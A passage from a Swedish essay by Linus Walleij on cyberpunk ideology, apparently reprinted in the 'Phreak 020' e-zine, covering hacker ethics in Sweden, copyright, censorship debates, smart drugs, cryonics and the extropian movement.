föregångstänkare, ansåg i princip att privat egendom är en del av den
naturliga världsordningen. Det vet vi numera att det inte är. I själva verket
har vi människor kommit överens om att det skall finnas något som heter privat
egendom, och de flesta av oss gör denna överenskommelse utan att vi vet om
det. Informationstekniken tar upp medvetandet om sådana konventioner på ett
pinsamt påtagligt plan.
Ett aktuellt exempel på detta är kontroversen med Scientologikyrkan som
blossat upp på Internet. En avhoppare från rörelsen publicerade
scientologernas heligaste och hemligaste dokument elektroniskt och
tillgängligt för alla. Scientologerna blev inte glada, och har lyckats tjata
på de systemansvariga så att de tagit bort dokumenten som de betraktar som sin
intellektuella egendom. Vilket skall gå först i ett sådant fall?
Yttrandefrihet och offentlighet eller copyright? (Inte för att scientologernas
papper har så högt intellektuellt värde, men ändå - det är en principsak.) Jag
skall återkomma till den här frågan i näst sista kapitlet om det cybernetiska
samhället.
Vad vill egentligen cyberpunkarna? De vill ha maximal frihet åt individen,
samtidigt som de vill ha en otroligt stark stat som kan garantera fria
kommunikationer. Är inte detta bara att plocka de godaste bitarna ur några
befintliga ideologier och konstruera ett stort populistiskt system? Nej, att
betrakta cyberpunken på det viset är att återigen tillämpa samma måttstock som
använts för alla andra ideologier. Cyberpunken saknar nämligen en klart
utmönstrad utopi. Den *är* ingen genuin ideologi, snarare ett sätt att
betrakta världen. Den allmänna inställningen till hur problem skall lösas är
*"som det verkar bäst"*. Att diskutera i termer av praktiska åtgärder är
tämligen ointressant. Alla åtgärder är i praktiken kompromisser mellan
individens frihet och massans trygghet.
I cyberpunkens natur ligger av tradition en vilja att bryta sig ur dessa
begreppssytem. Det är lätt att missförstå en cyberpunkare och börja diskutera
begrepp som ligger på ett helt annat plan. Man måste här betänka att en
cyberpunkare *inte* accepterar alla värderingar som vi är så vana vid att vi
betraktar dem som självklara. Du skulle t ex kunna fråga en cyberpunkare hur
hon/han ställer sig till att politiker kan höja sina egna löner. Han/hon höjer
kanske på ögonbrynen och frågar: *"hur kan du acceptera att det finns något
som kallas 'löner' ?"*
En sådan motfråga är nästan tabu, och så svår att ta åt sig att man gärna
betraktar personen som enbart dum i huvudet. Likväl finns det, som du nu har
förstått, en tydlig tankegång bakom. (Med ett ord skulle man kunna säga att
cyberpunken innehåller *metafilosofiska inslag*, men det är nog inte alla som
förstår vad jag menar om jag skriver det.)
Det mest skrämmande med cyberpunkare är kanske just detta att de betraktar
mänskligheten med en sorts ironisk distans; de ser att människorna är slavar
under ett gigantiskt informationssystem, och samtidigt vet de hur lätt det är
att manipulera information. För en cyberpunkare är en rik människa inget annat
än en hyfsad hackare som lyckats manipulera informationsflödena till sin egen
fördel. Då grundtesen inom cyberpunkideologi är att ingen information kan
ägas, kan ingen människa heller vara "rik". Rikedom blir för individen bara en
fråga om att manipulera information så att andra accepterar att hon/han *är*
rik.
_Cyberpunk i Sverige_
Cyberpunken, främst hackaretiken och medborgarrättsrörelsen, har funnits
länge i Sverige. Att hackaretiken fått sådan bred spridning bland hackare och
andra dataintresserade ungdomar i Sverige beror i princip endast på en enda
man - chefredaktören för hemdatortidningen *Datormagazin*: _Christer
Rindeblad_. Tidningen, som närmast var en *bibel* för alla
hemdatorintresserade ungdomar under senare delen av 80-talet, publicerade
under 1987 en artikelserie om hackarnas ursprung, författad av Rindeblad
själv. I #7 1987 publicerade man för första gången hackaretikens motton på
svenska, och i artiklarna i övrigt kan man tydligt spåra ett starkt inflytande
från denna etik. Man var öppen för diskussion på insändarsidorna och uttryckte
vid ett flertal tillfällen sin ståndpunkt att kompiskopiering inte är så
farligt jämfört med organiserad piratverksamhet.
*"Om sanningen skall fram har nog de flesta av oss piratkopior i våra
diskettlådor.* (...) *Visst kan man moralisera över detta, men det hjälper
föga. Frågan är om det går att stoppa kompiskopieringen. En del branchfolk
anser tom att denna typ av piratkopiering vitaliserar branchen.
Piratkopiorna är en form av reklam. De riktigt bra programmen säljs ändå
därför att folk vill ha originalet med en riktig manual.* (...)* Största
hotet kommer från de professionella programpiraterna."*
(_Christer Rindeblad_ i *Datormagazin* #7 1987, ledarsidan.)
Christer, som själv är gammal hackare, måste ha fått utstå mycket ovett från
databranchen efter sådana här uttalanden. Den officiella attityden från
mjukvarujättarna är benhårt auktoritär och menar att all kopiering av mjukvara
inte bara är förbjuden, utan också skadlig för branchen. (I praktiken struntar
man i alla fall som rör kopiering i mindre skala.) Under ett tag var tidningen
Datormagazin ovanligt uppkäftig trots att den i princip satt i knät på
mjukvarubranchen. Senare har man tonade man ned hackarattityden. Numera är
tidningen nedlagd.
Så vitt jag vet finns det inga rent politiskt aktiva svenska cyberpunkare,
i varje fall inte organiserade - men det är sannolikt bara en tidsfråga innan
de uppstår. I Sverige kan de komma att uppstå ur nyliberala sammanslutningar
eller som en sidogren av annan underjordisk kultur. De svenska *anarkisterna*
är av tradition motståndare till högteknologi och har hittills inte flirtat
med cyberpunken. En och annan autonom sammanslutning har dock börjat tänka om
på den här punkten.
En del högskoleföreningar, framför allt _Lysator_ vid Linköpings tekniska
högskola (som är känd för att dyrka 60-talets hackarideal) är ibland inne på
cyberpunkspåret. För det mesta är det dock en smula vinklat av medlemmarnas
egna politiska idéer. Sådana dataföreningar är också av tradition rädda för
att alltför mycket stöta sig med etablissemanget och håller sig till lite
lagom harmlösa politiska grupperingar som _EFF_, _Free Software Foundation_
(se nästa kapitel) och _League for Programming Freedom_. (Detta började redan
på MIT då högskolehackarna låste in sig på institutionen medan hippierna stod
utanför och demonstrerade mot Vietnamkriget.) De underjordiska hackarna som
inte behöver vara rädda om yrkesheder och status är betydligt mer radikala.
Många högskolehackare har dock goda kontakter med, och sympatiserar med de
underjordiska hackarna.
Det kontroversiella (och läsvärda) svenska fanzinet *Flashback* har ibland
lite grand av cyberpunkkaraktär; bland annat publicerar man intervjuer med
udda artister och politiskt omöjliga personer som Albert Hoffman och Timothy
Leary, listor med namn och address på människor som begått brott etc.
Huvudsakligen intresserar man sig dock mest för allmänna tryckfrihetsfrågor
typ filmcensur, och publicerar material som andra medier helst inte vill
befatta sig med; ungefär som *Folket i Bild / Kulturfront* - fast helt utan
moralisk urskiljning, och långt mindre politisk. Om det retar någon - tryck
det i så fall.
Denna tidning har också en djupt ideologisk klangbotten: det är,
förvånande nog, ett medium som kritiserar media. Flashback plockar fram all
den information som etablerade massmedia undviker eller sorterar bort, helt
enkelt därför att det är *för* kontroversiellt, *för* osmakligt, och *för*
politiskt inkorrekt. Flashback visar, kort sagt, att även den fjärde
statsmakten ljuger för oss. Exempelvis tryckte man en lista över vilka
tidningar som uppbar presstöd, och hur mycket. Detta är nästan *tabu* i
etablerade tidningar. Det vore att kritiskt granska sin egen branch, att
exponera sina egna privilegier och visa vilken ekonomisk makt media i själva
verket har.
*"Att skriva om olika undergroundrörelser och subkulturer, men samtidigt
ta avstånd från t ex nazism skulle enbart innebära att vår bevakning blev
sämre, mer trångsynt och avsevärt mer begränsad. Det finns redan mängder
av politiskt korrekta tidningar..."*
(_Jan Axelsson_, redaktör för *Flashback* ur *Flashback #3* 1995)
Huvuddraget i just cyberpunkideologi är att man förespråkar *kopiering* av
dataprogram samt litterära och visuella alster, dvs att man är *mot* copyright
- att information inte kan och inte bör ägas.
Cyberpunkarna liksom nyliberalerna anser att det inte finns "farlig"
information - bara farliga människor. Att som i Sverige censurera filmer för
vuxna människor ses som ett förakt av den mänskliga intelligensen. Vad har
auktoriteterna som klipper filmerna som inte människor i gemen har? Vad gör
dem bättre? Det finns bara ett vettigt svar på den frågan: *Värderingar*.
Cyberpunkaren har sina egna värderingar, och tänker inte tumma på dem. Alla
restriktioner av information är av ondo och syftar bara till att bevara
samhället så som det alltid varit, en form av statsfinansierad tankekontroll.
I det här avseendet är cyberpunken kraftigt influerad av den samhällssyn som
William Burroughs framför i sina böcker, om den lilla människan som insydd i
ett maskineri som andra människor är roade av att kontrollera. Den yttersta
spetsen mot människans integritet i detta maskineri blir givetvis censuren.
Cyberpunkaren frågar sig: Varför får jag inte se oklippta filmer? Varför
får jag inte äga bombrecept och steg-för-steg anvisningar på hur man
tillverkar LSD? Varför? Litar inte samhället på mitt omdöme? Om jag inte kan
bedöma vad som är bra eller dåligt för min och andras hälsa, kan då samhället
lita på mitt omdöme när det gäller politiska ideologier? Varför inte förbjuda
farliga politiska böcker av IRA, Timothy Leary och Jerry Rubin? Eller konstiga
kvasireligiösa skrifter av Hans Scheike? Varför inte förbjuda allt som kan
göra medborgare uppkäftiga mot myndigheter, och all kritisk granskning över
huvud taget? Varför inte ta bort offentlighetsprincipen? Varför inte införa
obligatoriska drog- och psyktester för alla medborgare med jämna mellanrum, så
att vi hittar alla missbrukare med en gång? Varför lita på någon alls?
Problemet med datorer och tryckfrihet är en sprängfråga. Tryckfrihet var
från början tänkt att motverka politisk censur. I och med liberalismens intåg
med Locke och Voltaire på 1700-talet ansågs detta så viktigt att Sverige som
andra land i världen avskaffade censuren. I tryckfrihetsförordningen år 1766
ville man främst värna om folkbildningen och hade inte en tanke på de problem
med bilder, filmer, elektroniska media och tecknade serier som skulle dyka upp
i vår tid. *Men* många av censurens försvarare ville redan då värna om "den
goda smaken". Intresse av bombtillverkning, narkotikaframställning eller
sexuella perversioner kan knappast kallas för god smak. Därför förordar man
censur. *Damer utan kläder bör man inte titta på...*
*Ändå måste man nu fråga sig: Vad är det vi skall ha tryckfriheten till?
Och vad skulle censuren vara bra för? Om det nu finns människor som försvarar
dessa dokuments existensberättigande, vad är det då som driver dem? Med ett
idiotiskt bakvänt resonemang skulle man givetvis kunna säga att de måste vara
terrorister, narkomaner eller "fula gubbar". Men kanske är det inte dokumenten
i sig som intresserar försvararna, utan snarare dokumentens *blotta existens?*
Att all information är lika mycket värd och att vi inte har rätt att
kollektivt sätta oss till doms över den. Spridandet av dylika dokument skulle
alltså kunna vara en *politisk aktion*, även om det är ett brott.
Detta sätter saken i ett helt nytt ljus. Det finns alltså en politisk
vilja som utgår från information som ett centralt begrepp för människans
tillvaro. Genom att inta information formas våra personligheter, och
myndigheterna vill genom censuren styra vår rätt att forma våra egna
personligheter som vi själva vill. Det har inte längre med fördelandet av
resurser och andra politiskt-ekonomiska mål att göra; det här handlar om
makten över det egna psyket.
Antag att jag läste ett antal dokument om narkotikaframställning i någon
underjordisk databas. Om jag kunde dessa saker utantill, och regeringen kunde
ingripa i mitt huvud, skulle de då göra det, för att återställa ordningen? Är
vissa tankar "förbjudna"?
*"Det finns alldeles för mycket respekt för myndigheter i samhället, det
märker jag inte minst i mitt jobb. Det behövs mer civil olydnad, det är
ingen större skada om man i databaserna diskuterar hur man ska lura en
telefonväxel att bara debitera 23 öre istället för 13:23. Inte heller är
det särskilt allvarligt att förmedla hur man gör dynamit och krut."*
(_Jan-Inge Flcht_, socialinspektör, sysop för den legendariska BBS:en
*Tungelstamonitorn* och handfast förkämpe för yttrandefriheten.)
_Att Förbättra Människan_
Inom den litterära cyberpunken förekommer ofta elektroniska inplantat i
hjärnan som ett sätt att förstärka människans mentala förmågor. Detta är
anledningen till att det bland cyberpunkarna finns en vilja att med
artificiella stimuli förbättra eller förlänga kroppens funktioner. En del
*gör* det också, men i brist på avancerad mikrokirurgi tar de till speciella
droger, sk *nootropiska läkemedel* (eng: *nootropics*) eller som de också
kallas: *smarta droger* (eng: *smart drugs*). Förutom de vanliga
hälsokostpreparat (läs: smarta drycker) som ravare gärna stoppar i sig,
använder man gärna en rad läkemedel som _DHEA_, _DMAE_, _Lucidril_ och
_Nootropyl_ (därav namnet) som ibland sägs fördröja åldrandet, förbättra
kognition, intelligens och minne osv. Det finns inga vetenskapliga belägg för
att dessa preparat verkligen fungerar. Om man jämför dem med narkotiska
preparat framstår de dock som tämligen harmlösa. En del skulle säkert få
passera som naturmedel vid en granskning.
Att diskutera droger är alltid farligt i Sverige eftersom fruktan för
droger tack vare flertalet propagandakampanjer är mycket djupt inpräntad i den
svenska folksjälen. Låt oss nöja oss med att konstatera att det är politiskt
korrekt att säga att man blir piggare av att dricka kaffe, medan det däremot
är fruktansvärt politiskt inkorrekt att säga att man äter koffeintabletter för
att hålla sig vaken. (Samma självemotsägande resonemang som säger att det är
mindre farligt att dricka vin än att dricka sprit.) Själv slutade jag med
kaffe för att istället äta koffeintabletter eller dricka Jolt-cola om jag
behöver hålla mig vaken. Eftersom det i dagsläget inte finns något som tyder
på att smarta droger skulle vara vanebildande förtjänar de samma öppna
debattklimat som gäller de flesta andra hokus-pokus mediciner som säljs via
damtidningarnas helsidesannonser.
En vetenskap som har anknytning till detta är *kryoniken* (eng:
*cryonics*), ofta kallad kvacksalveri - den går ut på att frysa in en persons
huvud, alternativt hela kroppen, i hopp om att den i framtiden skall kunna
tinas upp och återfå livet med hjälp av ny medicinsk teknik. Tekniken
förekommer bl a i filmen *Demolition Man* (1994), där grova brottslingar
straffas med nedfrysning för att ha en chans att överleva sina månghundraåriga
fängelsestraff. (Den som känner till det amerikanska rättsväsendet vet att det
förekommer att människor döms till fängelse i flera hundra år.) Om dessa
stackars huvuden och frusna 70-åriga kroppar kommer att återuppväckas får väl
i dagsläget anses ganska tveksamt. Om inte annat så visar det i alla fall att
det finns några som ännu har framtidstro och litar på att vi människor fixar
det mesta.
Modifikationer av den mänskliga kroppen ansluter till medicinsk
cybernetik, där man bl a försöker få naturliga nervimpulser att styra proteser
genom att läsa av nervsignalerna med inplanterade kiselplattor. Kanske är alla
dessa tankar bara en naturlig förlängning av den fixering vid kroppskontroll
som är allmänt utbredd i vårt samhälle, med plastikkirurgi, parfymer,
sportmaskiner och allt vad det innebär. Människan tycks i vår tid ha en
dragning till det artificiella - gränserna mellan människa och maskin suddas
ut alltmer. Var och en inser att om det plötsligt skulle bli möjligt att
operera in en relativt enkel dator i huvudet som gjorde att man alltid kunde
hålla reda på exakt tid och utföra vanliga miniräknaroperationer med tankens
hastighet skulle många säkert finna detta verktyg så nyttigt att det snart
skulle vara kö utanför operationssalarna. (Läs mer i kapitel 12 om virtuell
verklighet.)
Lägg märke till den tydliga gemensamma nämnaren: att man här återigen
försöker bryta ned betvingande system. Kroppens begränsningar och livets
längd. Varför acceptera dessa gränser för den mänskliga varelsen? Skulle det
vara *omoraliskt*, *onaturligt* eller *äckligt* att förbättra kroppen?
Knappast. I så fall hade Gud redan straffat de som skaffat sig en enkel
pacemaker. I och för sig kan man fråga sig om det är så nödvändigt att pumpa
upp bröst med silikon eftersom det inte har någon praktisk användning, men hur
är det med elektroniska implantat som man verkligen har nytta av? Varför
acceptera gränser - det har ju ingen varelse gjort förut. Varför skulle inte
människoapan plocka upp stenen från marken och kasta den? Varför skulle inte
den moderna människan med aldrig sinande kraft försöka ta sig ur skalet...?
_Extropiker_
En annan rörelse som uppstått i Californien är en slags halvfilosofisk
framtidsfetischistisk rörelse som bäst representeras av den officiella linjen
hos den nuvarande redaktionen på _MONDO 2000_. *Extropiker* är en blandning av
cyberpunkare, nyliberaler (främst objektivister) och allmänt uttråkade
nätsurfare. (Nätsurfare är folk som sitter uppkopplade mot Internet så ofta de
kan och bara låter sig överväldigas av den enorma informationsströmmen.)
Extropikerna utgör en slags positiv motpol till den pessimistiska
cyberpunkrörelsen. Till skillnad från cyberpunkförfattarna tror man att
tekniken kommer att leda till större frihet för individen och mindre förtryck.
För att detta skall kunna ske måste dock fria individer ta kontrollen över den
tekniska utvecklingen.
Den allmänna tanken bakom den extropiska filosofin är att den teknik som
produceras i vår tid går så hastigt fram att inga statliga institutioner är
snabba nog att hinna tillämpa innovationerna innan de redan är föråldrade, och
när de väl tillämpas sker det på ett sådant sätt att det främjar statens makt
och kontroll. Man menar därför att individen själv måste försöka förstå och ta
till sig tekniken innan staten blandar sig i och saboterar hela nöjet med
lagstiftning och moraliska restriktioner. I den objektivistiska filosofin
anser man att människan bara skall lyda en röst, nämligen sin egen, och att
individen ständigt måste slåss mot kontrollerande övre makter.
Filosofin är även i många stycken nedärvd från Timothy Leary som i sina
böcker menade att staten ville förbjuda psykedeliska droger främst för att de
minskade statens kontroll av individen, och inte för att de var farliga. Bland
nyliberaler i allmänhet (och extropiker i synnerhet) är denna syn på staten
mycket vanlig. Till skillnad från nyliberaler är extropiker intresserade av
annat än bara legalisering av droger och en minimering av den statliga makten,
exempelvis DNA-manipulation, nanoteknik och kryonik.
När det gäller andra områden inom cyberpunkfilosofin, exempelvis konfliken
om *Intellektuell Egendom* (copyright) är man dock ensidigt förespråkare för
människans rätt att äga information, åtminstone den som man själv direkt eller
indirekt producerar. Detta beror främst på en lång tradition inom amerikansk
liberalism som började i och med koloniseringen i Amerika. Symbolerna för
denna liberalism är taggtråden och handeldvapnet - rätten att äga ett
landområde och att försvara det. (Från bland annat indianer och andra
barbarer.) Således befattar man sig högst ogärna med de som förespråkar
förändringar i copyrightlagarna.
På det hela taget påminner extropikerna om en slags digital variant av New
Age rörelsen, men det är knappast en definition de själva skulle hålla med om.
//Linus Walleij
.----------------------------------------------------------------------------.
Phreak 020 - Http://come.to/phreak020 - Joina Mailinglistan!
#Phreak020 på DALnet och EFnet //Celsius
Artiklar sändes till celsius@mindless.com
Tack Till VSU, VSP, KBB och 020 för inspiration!
'----------------------------------------------------------------------------'